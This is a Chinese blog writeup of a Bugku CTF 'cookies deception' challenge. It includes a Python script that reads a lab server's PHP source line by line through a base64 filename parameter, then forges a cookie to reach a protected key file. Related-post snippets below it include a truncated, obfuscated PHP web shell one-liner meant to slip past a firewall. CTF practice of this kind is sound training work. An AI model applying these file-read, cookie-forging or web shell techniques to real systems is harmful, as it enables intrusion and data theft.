【bugku】 cookies欺騙 writeup

阿新 • • 發佈：2019-02-14

看到url上的引數有base64，解碼發現是keys.txt
把改引數換成index.php，觀察發現line按行返回
所以自己練練手寫了個指令碼跑出來

#!/usr/bin/env python
# -*- coding: utf-8 -*-



import requests
s=requests.Session()
url='http://120.24.86.145:8002/web11/index.php'
for i in range(1,20):
    payload={'line':str(i),'filename':'aW5kZXgucGhw'}
    a=s.get(url,params=payload).content
    content=str(a,encoding="utf-8" 
)
    print(content)

獲得原始碼

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' 
 =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

構造cookie margin=margin 然後讀keys.php即可

這裡寫圖片描述

【bugku】 cookies欺騙 writeup

看到url上的引數有base64，解碼發現是keys.txt 把改引數換成index.php，觀察發現line按行返回所以自己練練手寫了個指令碼跑出來#!/usr/bin/env python # -

【bugku】【ZSCTF】【迷宮RE】Take The Maze WriteUp

Take The Maze 　　首先拿進PEID裡查一下有沒有殼：　　無殼，果斷拖進IDA。可是Graph View中找不到主程式的位置，在函式表裡尋找主函式：　　函式太多阻擾了我們找到主程式，執行一下程式找一些關鍵詞來搜尋主程式位置：　　得知主程式中應當含有“welcome to

【bugku】【RE】file WriteUp

FILE 　　查殼後顯示無殼，拖進IDA：　　執行程式時傳遞的第一個引數為一個檔名，並開啟該檔案。下面點進去encode函式分析一下：　　for迴圈中每三個為一組，進行Base64的操作，接下來兩個if分別判斷Base64後的尾部是加一個“=”還是兩個“=”還是不加“=”。具體Base64編碼方

【Bugku】計算器 WriteUp

話不多說，先開啟題目老套路，先看hint，發現並沒有然後開啟題目連結 http://123.206.87.240:8002/yanzhengma/ 驗證碼？

【Bugku】web基礎$_POST WriteUp

開啟題目沒有hint 那就開啟題目連結 http://123.206.87.240:8002/post/ 程式碼審計這段程式碼的意思是用what來接收提交的一段字元然後輸出what 如果what接收的值為flag 則輸出flag &n

【bugku】CTF-練習平臺writeup

CTF-練習平臺writeupMISC滴答~滴看標題基本就知道是摩爾斯密碼“.”、”-“，直接線上摩爾斯解密聰明的小羊小羊。。。老套路翻柵欄，柵欄密碼。。。比較簡單，直接看出來是兩欄加密 KEY{sad23jjdsa2}這是一張單純的圖片？？看題目估計是道隱寫術的題，先儲

Bugku-WEB-cookies欺騙（缺一個python指令碼）

題目：這裡注意到filename=a2V5cy50eHQ=,應該是base64編碼，解碼一下，得到了keys.txt 想想應該怎麼利用一下呢。題目是cookies欺騙，可能keys.txt中應該存在我們所需要的cookies 解題：這裡想錯了。。沒仔細去看url

【CH5105】Cookies

lse return 都是 eve main sizeof can color mes 也是一道線型動態規劃的好題…… 讀入每個人的貪婪度之後，對其按照從大到小的順序排序，定義狀態f[i][j]為前i個人（排序後）分j個餅幹的答案，那麽答案為f

【轉】如何判斷ARP欺騙？該怎麽防護？

lin 運行如何單機窗口區域利用 folder 欺騙因為在進行通信的時候，數據是通過MAC地址與IP地址的對應關系來進行轉發的。若其中MAC地址與IP地址對應的關系出錯，就會導致數據錯誤轉發，影響正常通信。通過某種手段，來更改MAC與IP地址的對應關系，導致電腦

【PHP基礎】cookies和session

lex inpu form display ews action port 分配有一個 1.Cookies cookie 常用於識別用戶。cookie 是服務器留在用戶計算機中的小文件。每當相同的計算機通過瀏覽器請求頁面時，它同時會發送 cookie。通過 PHP，

Bugku_CTF Writeup 之 cookies欺騙

header 還需要 ati import Suite rep 一段 aer info 題目描述： http://120.24.86.145:8002/web11/ 答案格式：KEY{xxxxxxxx} 1.開局一個url與一串亂碼： http://12

【reversing.kr逆向之旅】ImagePrc的writeup

看到這道題有點懵執行後只有一個Check按鈕中間是空白的不知道什麼鬼(最後才知道是個繪圖板) PEiD載入發現還是沒殼 Vc++6.0編寫的程式 IDA載入進行分析首先還是Shif

【reversing.kr逆向之旅】Replace的writeup

無殼 vc++程式載入Olydbg動態除錯分析就好可以通過下API斷點GetWindowTextW來找到關鍵程式碼因為它就是用來捕獲我們的輸入的隨意輸入(這裡可以發現只可以輸入數字長度什麼的倒是沒有限制) 就像下面一樣&nbs

Bugku——cookies欺騙

URL的中的base64解碼為keys.txt。猜測檔名都是以base64的方式使用的。 key.txt的內容有些不明所以，乾脆去索引頁面（index.php）看看原始碼。 index.php用base64加密後替換key.txt的base64，頁面存在卻沒有

【bugkuctf】過狗一句話 writeup

過狗一句話 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_

【reversing.kr逆向之旅】Ransomware的writeup

Exeinfope查到有UPX殼使用脫殼機進行脫殼載入IDA 發現直接顯示太大無法展示空格轉為文字檢視可以很明顯知道下面紅框中的就是一段段花指令檢視最後結束的位置就在0x0044A775 直接IDC指令碼將他們都NOP掉

【reversing.kr逆向之旅】Position的writeup

有提示是說flag就是當Serial為76876-77776時的Name 有多解提示有四位且最後一位是p ReversingKr KeygenMe Find the Name when the Serial is 76876-77776 This pr

【WEB前端】COOKIES與SESSION的區別

寫在前面的對WEB前端的知識回顧的當中，覺得COOKIES和SEESION的應用層面有些相似，但是具體怎樣卻不是很清楚，下面就來總結一下這兩個東西的共同點和區別，幫助自己能夠更好的掌握這些基礎

6、自學——Linux的學習進度與任務【FHS】

include 同名 med 可選第三方安裝 lin 三方引導 FHS：文件層次標準 FHS:文件層次標準　　 / : 代表根目錄　　 /bin: 二進制文件，可執行程序，所有用戶都能用。　　/sbin: 只有管理員執行的，二進制可執行程序。

【bugku】 cookies欺騙 writeup

相關推薦